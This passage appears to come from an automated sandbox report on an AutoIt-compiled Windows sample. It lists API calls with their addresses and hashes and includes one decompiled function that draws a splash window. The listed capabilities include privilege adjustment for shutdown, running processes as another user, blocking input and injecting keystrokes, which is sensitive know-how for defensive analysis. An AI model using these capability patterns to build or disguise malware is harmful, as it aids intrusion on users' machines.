                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 2889586943-2988720461
                • Opcode ID: 3d732c405d62bbf98401b17a0766e9a25a03a44eb39093922c88271fecc16cdc
                • Instruction ID: 7133001f7b84f7bfe46e2646bba7a9723e9d441e9ac7adde1229f505a74266de
                • Opcode Fuzzy Hash: 3d732c405d62bbf98401b17a0766e9a25a03a44eb39093922c88271fecc16cdc
                • Instruction Fuzzy Hash: D04153717402147FE7245BA4AE4AFBE7B6CDB84B11F10402AFA09EB1D0D6F459809BA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 00436243
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00436294
                • CloseHandle.KERNEL32(?), ref: 004362A6
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004362BE
                • GetProcessWindowStation.USER32 ref: 004362D7
                • SetProcessWindowStation.USER32(00000000), ref: 004362E1
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004362FD
                • _wcslen.LIBCMT ref: 0043639E
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _wcsncpy.LIBCMT ref: 004363C6
                • LoadUserProfileW.USERENV(?,00000020), ref: 004363DF
                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004363F9
                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00436428
                • UnloadUserProfile.USERENV(?,?), ref: 0043645B
                • CloseWindowStation.USER32(00000000), ref: 00436472
                • CloseDesktop.USER32(?), ref: 00436480
                • SetProcessWindowStation.USER32(?), ref: 0043648E
                • CloseHandle.KERNEL32(?), ref: 00436498
                • DestroyEnvironmentBlock.USERENV(?), ref: 004364AF
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                • String ID: $default$winsta0
                • API String ID: 2173856841-1027155976
                • Opcode ID: 4338fbde08e8536bf0e631538042279884627ad7de838f85fc568e42ea7e5a3b
                • Instruction ID: 5d335f63aa796c3b87b05e3a5deb3dcb35a681525c29cf2490d566998fc1f2ce
                • Opcode Fuzzy Hash: 4338fbde08e8536bf0e631538042279884627ad7de838f85fc568e42ea7e5a3b
                • Instruction Fuzzy Hash: AF818F70E0020ABBDB10DFA4CD4AFAF77B8AF48704F15811AF914A7281D7B8D941CB69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00421A97
                • GetFileAttributesW.KERNEL32(?), ref: 00421AD4
                • SetFileAttributesW.KERNEL32(?,?), ref: 00421AEA
                • FindNextFileW.KERNEL32(00000000,?), ref: 00421AFC
                • FindClose.KERNEL32(00000000), ref: 00421B0D
                • FindClose.KERNEL32(00000000), ref: 00421B21
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00421B3C
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00421B83
                • SetCurrentDirectoryW.KERNEL32(0047AB0C), ref: 00421BA7
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00421BAF
                • FindClose.KERNEL32(00000000), ref: 00421BBA
                • FindClose.KERNEL32(00000000), ref: 00421BC8
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: a82d3c60c48cf829ad5c2d8f4c4a1295047b4b95c31dd1c89f337ed4c0a7b069
                • Instruction ID: 95bf813be199b7eb69b3cb3bd60cec894b5a95bc5b739d220d0c4ccfff250f0d
                • Opcode Fuzzy Hash: a82d3c60c48cf829ad5c2d8f4c4a1295047b4b95c31dd1c89f337ed4c0a7b069
                • Instruction Fuzzy Hash: 3641D8726003146FC700EF65EC41EAB77ACEA95311F444A2FF958C3190E779E919C7A9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 0043282F
                • FindNextFileW.KERNEL32(00000000,?), ref: 00432892
                • FindClose.KERNEL32(00000000), ref: 004328A3
                • FindClose.KERNEL32(00000000), ref: 004328B7
                • FindFirstFileW.KERNEL32(*.*,?), ref: 004328D4
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00432923
                • SetCurrentDirectoryW.KERNEL32(0047AB0C), ref: 00432946
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00432950
                • FindClose.KERNEL32(00000000), ref: 0043295B
                  • Part of subcall function 00423BED: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00423C0F
                • FindClose.KERNEL32(00000000), ref: 00432969
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: 4f6154c7702d20344f19e07c40d1934ff9cb748af6a2ee1e3095019a6807c423
                • Instruction ID: 80f5b98b788b931d1389de46317c7341cba4560d25c85307fb274a39477ffa67
                • Opcode Fuzzy Hash: 4f6154c7702d20344f19e07c40d1934ff9cb748af6a2ee1e3095019a6807c423
                • Instruction Fuzzy Hash: E141EF726001186BCB14EF64ED45FEF736CDF8D311F1046A7ED08A3280D6B99A55CA69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00426DB5: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00426DCF
                  • Part of subcall function 00426DB5: GetLastError.KERNEL32(?,00000000,?), ref: 00426DD9
                  • Part of subcall function 00426DB5: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00426DFF
                  • Part of subcall function 00426D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00426D9C
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00436090
                • _memset.LIBCMT ref: 004360A5
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004360C4
                • GetLengthSid.ADVAPI32(?), ref: 004360D6
                • GetAce.ADVAPI32(?,00000000,?), ref: 00436113
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043612F
                • GetLengthSid.ADVAPI32(?), ref: 00436147
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00436170
                • CopySid.ADVAPI32(00000000), ref: 00436177
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004361A9
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004361CB
                • SetUserObjectSecurity.USER32 ref: 004361DE
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                • String ID:
                • API String ID: 3490752873-0
                • Opcode ID: 86eac929b10f32da6a75f321a1d8df174c125bfc9072d1b7a5a16360ebf2c3ea
                • Instruction ID: 4d190918310e806d00db9422572f6903172f75a72b021b93cfbb84b87bf0e456
                • Opcode Fuzzy Hash: 86eac929b10f32da6a75f321a1d8df174c125bfc9072d1b7a5a16360ebf2c3ea
                • Instruction Fuzzy Hash: 76516F71A0021ABBDB10DFA5CC84EAF777CAF49700F05C51AF515A7241DA78DA45CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004233B3
                • OpenProcessToken.ADVAPI32(00000000), ref: 004233BA
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004233CF
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004233F3
                • GetLastError.KERNEL32 ref: 004233F9
                • ExitWindowsEx.USER32(?,00000000), ref: 0042341C
                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 0042344B
                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0042345E
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                • String ID: SeShutdownPrivilege
                • API String ID: 2938487562-3733053543
                • Opcode ID: dc280398fd3bcac2e54245ffcecbe1c57cf5b3e37f0d4acbb84a44555a3cbd54
                • Instruction ID: 26e45139c53a4b043da90095ffd15cb1165153439473cecf43d134f8fe378c28
                • Opcode Fuzzy Hash: dc280398fd3bcac2e54245ffcecbe1c57cf5b3e37f0d4acbb84a44555a3cbd54
                • Instruction Fuzzy Hash: 6D21D771740204ABEB109FA4EC4EFBA777CEB04702F504095FE0DD61C1DABD99408668
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: f4023f0d7633e39e5a9f468fa8612488921d4d4f6bb02cc43e2d55dc646ed85a
                • Instruction ID: 051531582a97b4735d62f642228d58bfa74de96795a41cc717e50e7d9efcbc5c
                • Opcode Fuzzy Hash: f4023f0d7633e39e5a9f468fa8612488921d4d4f6bb02cc43e2d55dc646ed85a
                • Instruction Fuzzy Hash: A241BF726101059FD710EFA5EC89BAEB7A4FF14315F10856AFA09CB2A1DBB1E940CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32(?), ref: 00434320
                • GetKeyboardState.USER32(?), ref: 00434335
                • SetKeyboardState.USER32(?), ref: 00434389
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004343B9
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004343DA
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00434426
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0043444B
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 797ffe0dd0257db8280baef5dc5ea1d5269b3c190d11f1f502e6f239c7fe3c07
                • Instruction ID: d6036a09f0410141df0f8a7a36a9f13de57e7228f46dd4117ede3677b43e53c7
                • Opcode Fuzzy Hash: 797ffe0dd0257db8280baef5dc5ea1d5269b3c190d11f1f502e6f239c7fe3c07
                • Instruction Fuzzy Hash: B851F6A06047D139F73282788845BF7BFA85F8A300F08968BF1D5166C3C3ACB994C769
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00411EE1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00411EF6
                • UnhandledExceptionFilter.KERNEL32(pqH), ref: 00411F01
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00411F1D
                • TerminateProcess.KERNEL32(00000000), ref: 00411F24
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: pqH
                • API String ID: 2579439406-3851628631
                • Opcode ID: 76a4a1cb2b01e0a50a6e58789e026dfc9a796836f3f469b05f03d999b71467fd
                • Instruction ID: 30365eeef1e4ff0e4db8f98ef38b686c0ee9cfc6df37bf8d7e9ec5342245821f
                • Opcode Fuzzy Hash: 76a4a1cb2b01e0a50a6e58789e026dfc9a796836f3f469b05f03d999b71467fd
                • Instruction Fuzzy Hash: 9C21FEB44182048FD750DF64FEA86483BA0FB08310F6009BEF90887770E7B998858F0D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003F1D10: _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 003F1D10: _memmove.LIBCMT ref: 003F1D57
                • FindFirstFileW.KERNEL32(?,?), ref: 00442455
                • Sleep.KERNEL32(0000000A), ref: 00442481
                • FindNextFileW.KERNEL32(?,?), ref: 0044255F
                • FindClose.KERNEL32(?), ref: 00442575
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                • String ID: *.*
                • API String ID: 2786137511-438819550
                • Opcode ID: 4c724cb49aa6647ad89b2670bef91bca96b3c96a585777c43db9919d67efa025
                • Instruction ID: d2d5a101c081467a6772542e42e7faf52dbacc670dde7378d33dcc2e95f85a2e
                • Opcode Fuzzy Hash: 4c724cb49aa6647ad89b2670bef91bca96b3c96a585777c43db9919d67efa025
                • Instruction Fuzzy Hash: 2C41AD71A00219AFDF14DF68CD84AEFB7B4EF44300F54855AF908A7251D778AE85CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicollmouse_event
                • String ID: DOWN
                • API String ID: 1033544147-711622031
                • Opcode ID: 596a05bca37152281f53ba00e005dd8cde10fd7c68228b4835bf4fc2c9ca1cf3
                • Instruction ID: 0163ec2d099f83383aea6db4697352a71666925dc5b5ab2e1961746422a59027
                • Opcode Fuzzy Hash: 596a05bca37152281f53ba00e005dd8cde10fd7c68228b4835bf4fc2c9ca1cf3
                • Instruction Fuzzy Hash: E0F0E5726947203AF80066943C02EF7735C8B11BA7F004022FE0CE52C0D9A92E1546FD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __time64.LIBCMT ref: 00432D3F
                  • Part of subcall function 004047D3: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00420DB1,00000000,?,?,00431DDE,?,00000001), ref: 004047DE
                  • Part of subcall function 004047D3: __aulldiv.LIBCMT ref: 004047FE
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Time$FileSystem__aulldiv__time64
                • String ID: @uI$DuI
                • API String ID: 2893107130-3537921471
                • Opcode ID: 65fee1ac54eef0fbcc29c377aa998a7d0912e58b1f4e58bdb1c3e86381179d98
                • Instruction ID: d8bd8dfaea2b50b4b561ebf83995aa1135b722c7663f9d4b0ceb52ac3c5caf8e
                • Opcode Fuzzy Hash: 65fee1ac54eef0fbcc29c377aa998a7d0912e58b1f4e58bdb1c3e86381179d98
                • Instruction Fuzzy Hash: 8C2190335705108BF320CF36DC45652B3E2EBE4310F268A7AD4A5973D5DAB96906CB98
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 004322A5
                • InternetReadFile.WININET(?,00000000,?,?), ref: 004322DD
                  • Part of subcall function 00432252: GetLastError.KERNEL32 ref: 00432268
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 901099227-0
                • Opcode ID: ec4cd29b4f6d0e5263cabfa169e7c7294501a0cf11009abb59de10d5aa53b7a4
                • Instruction ID: 4a3e40c0030e6b9e75cfeac01c07d89ae59c2f2721b02ebe62889567e50ba740
                • Opcode Fuzzy Hash: ec4cd29b4f6d0e5263cabfa169e7c7294501a0cf11009abb59de10d5aa53b7a4
                • Instruction Fuzzy Hash: 0021A9716002047BE710EF55DD81FEB73ACFF98724F10C02BFA099A280D6B8E5458BA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • BlockInput.USER32(00000001), ref: 0044A378
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                • Opcode ID: a51f79615e51f01a02f12524a264e33fc699698ac8ec544b05808eca3a56fe77
                • Instruction ID: a48b1e316954c5df4f5936b9f5a421ca46725d2d45021d6a10ccbd5c27cd5536
                • Opcode Fuzzy Hash: a51f79615e51f01a02f12524a264e33fc699698ac8ec544b05808eca3a56fe77
                • Instruction Fuzzy Hash: D2E04F35240309ABD710AF65D948A66B7E8EF947A0F10C42AED4ACB351EB74E840CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00426C83
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: LogonUser
                • String ID:
                • API String ID: 1244722697-0
                • Opcode ID: 342d56972a928b1cdd2608d3e8753838fac2bfe8944b0b0f0865d0af1e32a9ad
                • Instruction ID: afe27ffb825b5d6e714b34ea5a103c0cbaa18009da9d83564f382719990882ec
                • Opcode Fuzzy Hash: 342d56972a928b1cdd2608d3e8753838fac2bfe8944b0b0f0865d0af1e32a9ad
                • Instruction Fuzzy Hash: C7E012B626464EAFDB04CF68DC43EBF37ADE748710F004614BA16D7280C670E911CA74
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004494D6(signed int __eax, void* _a4, void* _a8, struct HWND__* _a12) {
                				signed int _v8;
                				signed int _v12;
                				int _v16;
                				int _v20;
                				struct tagRECT _v36;
                				int _v40;
                				char _v44;
                				long _v48;
                				short _v180;
                				signed int _t151;
                				struct HWND__* _t161;
                				int _t173;
                				int _t179;
                				int _t196;
                				int _t198;
                				void* _t199;
                				void* _t202;
                				void* _t207;
                				int _t224;
                				int _t227;
                				struct HWND__* _t231;
                				signed char _t251;
                				void* _t260;
                				void* _t261;
                				void* _t266;
                				struct HDC__* _t267;
                				void* _t268;
                				struct HWND__* _t269;
                				struct HDC__* _t270;
                				struct HWND__* _t271;
                				long _t273;
                				struct tagRECT* _t275;
                				signed int _t276;
                				int _t288;
                				intOrPtr _t311;
                				void* _t323;
                				long _t335;
                				int _t338;
                				int _t339;
                				void* _t341;
                				long _t344;
                				int _t347;
                				int _t348;
                				void* _t350;
                				struct HWND__* _t351;
                				void* _t353;
                
                				_t151 = __eax | 0xffffffff;
                				_v8 = 0x1f4;
                				_v40 = 0x190;
                				_v20 = _t151;
                				_v16 = _t151;
                				_v48 = 0;
                				_v12 = 0x50000001;
                				_t344 = 0x88c00000;
                				_t335 = _t151 + 9;
                				if( *0x4874fc != 0) {
                					_t260 =  *0x487500;
                					if(_t260 != 0) {
                						DeleteObject(_t260);
                						 *0x487500 = 0;
                					}
                					_t261 =  *0x4874f8;
                					if(_t261 != 0) {
                						DeleteObject(_t261);
                						 *0x4874f8 = 0;
                					}
                					DestroyWindow( *0x4874fc);
                					 *0x4874fc = 0;
                				}
                				if(_a12 == 2) {
                					L36:
                					return 0;
                				} else {
                					_t275 =  &_v36;
                					GetWindowRect(GetDesktopWindow(), _t275);
                					_t266 = _a4;
                					if(_a8 >= 3) {
                						_t311 =  *((intOrPtr*)(_t266 + 4));
                						_t275 =  *(_t311 + 8);
                						if(E003FC8A0(_t275) != 0xffffffff) {
                							_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 8);
                							_v8 = E003FC8A0(_t275);
                						}
                					}
                					if(_a8 >= 4) {
                						_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0xc);
                						if(E003FC8A0(_t275) != 0xffffffff) {
                							_t311 =  *((intOrPtr*)(_t266 + 4));
                							_t275 =  *(_t311 + 0xc);
                							_v40 = E003FC8A0(_t275);
                						}
                					}
                					if(_a8 >= 5) {
                						_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0x10);
                						_v20 = E003FC8A0(_t275);
                					}
                					if(_a8 >= 6) {
                						_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0x14);
                						_v16 = E003FC8A0(_t275);
                					}
                					if(_a8 >= 7) {
                						_t311 =  *((intOrPtr*)(_t266 + 4));
                						_t275 =  *(_t311 + 0x18);
                						if(E003FC8A0(_t275) != 0xffffffff) {
                							_t275 =  *( *((intOrPtr*)(_t266 + 4)) + 0x18);
                							_t251 = E003FC8A0(_t275);
                							_v48 = _t251;
                							if(_a12 == 1) {
                								if((_t251 & 0x00000008) != 0) {
                									_v12 = 0x50000002;
                								}
                								if((_t251 & 0x00000004) != 0) {
                									_t275 = (_v12 & 0x00000002 | 0xa0000001) >> 1;
                									_v12 = _t275;
                								}
                							}
                							if((_t251 & 0x00000002) != 0) {
                								_t335 = 0;
                							}
                							if((_t251 & 0x00000001) != 0) {
                								_t344 = 0x88800000;
                							}
                							if((_t251 & 0x00000010) != 0) {
                								_t344 = _t344 ^ 0x08000000;
                							}
                						}
                					}
                					_t276 = _t275 | 0xffffffff;
                					if(_v20 == _t276) {
                						asm("cdq");
                						_v20 = _v36.right - _v8 - _t311 >> 1;
                					}
                					if(_v16 == _t276) {
                						asm("cdq");
                						_v16 = _v36.bottom - _v40 - _t311 >> 1;
                					}
                					SetRect( &_v36, 0, 0, _v8, _v40);
                					AdjustWindowRectEx( &_v36, _t344, 0, _t335);
                					_t161 = CreateWindowExW(_t335, L"AutoIt v3", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t266 + 4))))), _t344, _v20, _v16, _v36.right - _v36.left, _v36.bottom - _v36.top,  *0x487518, 0, 0, 0);
                					 *0x4874fc = _t161;
                					GetClientRect(_t161,  &_v36);
                					_t347 = _v36.right - _v36.left;
                					_t338 = _v36.bottom - _v36.top;
                					_push(0);
                					_push(0);
                					_push(0);
                					if(_a12 != 0) {
                						_t339 = _t338 - 0x16;
                						_t348 = _t347 - 0x16;
                						_v8 = 0xc;
                						_v40 = 0x190;
                						_a12 = CreateWindowExW(0, L"static", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t266 + 4)) + 4))), _v12, 0xb, 0xb, _t348, _t339,  *0x4874fc, ??, ??, ??);
                						_t267 = CreateDCW(L"DISPLAY", 0, 0, 0);
                						SelectObject(_t267, GetStockObject(0x11));
                						GetTextFaceW(_t267, 0x40,  &_v180);
                						_v12 = GetDeviceCaps(_t267, 0x5a);
                						DeleteDC(_t267);
                						_t268 = _a8;
                						__eflags = _t268 - 8;
                						if(_t268 >= 8) {
                							_t207 = E004010E1(E00443381( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x1c))));
                							_t353 = _t353 + 4;
                							__eflags = _t207 - 1;
                							if(_t207 >= 1) {
                								E00401487( &_v180, E00443381( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x1c))));
                								_t353 = _t353 + 8;
                							}
                						}
                						__eflags = _t268 - 9;
                						if(_t268 >= 9) {
                							_t202 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x20)));
                							__eflags = _t202 - 6;
                							if(_t202 >= 6) {
                								_v8 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x20)));
                							}
                						}
                						__eflags = _t268 - 0xa;
                						if(_t268 < 0xa) {
                							L49:
                							_t173 = _v40;
                						} else {
                							_t272 = _a4;
                							_t198 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 0x24)));
                							__eflags = _t198;
                							if(_t198 < 0) {
                								goto L49;
                							} else {
                								_t199 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t272 + 4)) + 0x24)));
                								__eflags = _t199 - 0x3e8;
                								if(_t199 > 0x3e8) {
                									goto L49;
                								} else {
                									_t173 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t272 + 4)) + 0x24)));
                								}
                							}
                						}
                						_t179 = CreateFontW((0xc71c71c7 * _v12 * _v8 >> 0x20 >> 4 >> 0x1f) + (0xc71c71c7 * _v12 * _v8 >> 0x20 >> 4), 0, 0, 0, _t173, 0, 0, 0, 1, 4, 0, 2, 0,  &_v180);
                						_t269 = _a12;
                						 *0x487500 = _t179;
                						SendMessageW(_t269, 0x30, _t179, 1);
                						__eflags = _v48 & 0x00000020;
                						if((_v48 & 0x00000020) != 0) {
                							_t270 = GetDC(_t269);
                							_a8 = SelectObject(_t270,  *0x487500);
                							E0043379E( &_v44, __eflags, _t270, E00443381( *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 4))),  &_v44);
                							_t323 = _a8;
                							SelectObject(_t270, _t323);
                							_t271 = _a12;
                							ReleaseDC(_t271, _t270);
                							_t288 = _v40;
                							asm("cdq");
                							_t196 = (_t339 - _t288 - _t323 >> 1) + 0xb;
                							__eflags = _t196;
                							MoveWindow(_t271, 0xb, _t196, _t348, _t288, 1);
                						}
                						ShowWindow( *0x4874fc, 4);
                						__eflags = 0;
                						return 0;
                					} else {
                						_a8 = 0;
                						_a12 = CreateWindowExW(0, L"static", 0, 0x5000000e, 0, 0, _t347, _t338,  *0x4874fc, ??, ??, ??);
                						_t350 = CreateFileW(E00443381( *((intOrPtr*)( *((intOrPtr*)(_t266 + 4)) + 4))), 0x80000000, 0, 0, 3, 0, 0);
                						if(_t350 != 0xffffffff) {
                							_t273 = GetFileSize(_t350, 0);
                							_t341 = GlobalAlloc(2, _t273);
                							ReadFile(_t350, GlobalLock(_t341), _t273,  &_v48, 0);
                							GlobalUnlock(_t341);
                							CloseHandle(_t350);
                							__imp__CreateStreamOnHGlobal(_t341, 1,  &_v8);
                							__imp__#418(_v8, 0, 0, 0x4729f8,  &_a8);
                							_t224 = _v8;
                							 *((intOrPtr*)( *((intOrPtr*)( *_t224 + 8))))(_t224);
                							GlobalFree(_t341);
                							_t227 = _a8;
                							__eflags = _t227;
                							if(_t227 == 0) {
                								goto L36;
                							} else {
                								 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 0xc))))(_t227,  &_a4);
                								_a4 = CopyImage(_a4, 0, 0, 0, 0x2000);
                								_t231 = _a8;
                								 *((intOrPtr*)( *((intOrPtr*)(_t231->i + 8))))(_t231);
                								_t351 = _a12;
                								SendMessageW(_t351, 0x172, 0, _a4);
                								 *0x4874f8 = _a4;
                								SetWindowPos(_t351, 0, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top, 0x20);
                								ShowWindow( *0x4874fc, 4);
                								__eflags = 0;
                								return 0;
                							}
                						} else {
                							goto L36;
                						}
                					}
                				}
                			}

                APIs
                • DeleteObject.GDI32(?), ref: 00449528
                • DeleteObject.GDI32(?), ref: 0044953E
                • DestroyWindow.USER32(?), ref: 00449550
                • GetDesktopWindow.USER32 ref: 0044956E
                • GetWindowRect.USER32 ref: 00449575
                • SetRect.USER32 ref: 0044968B
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00449699
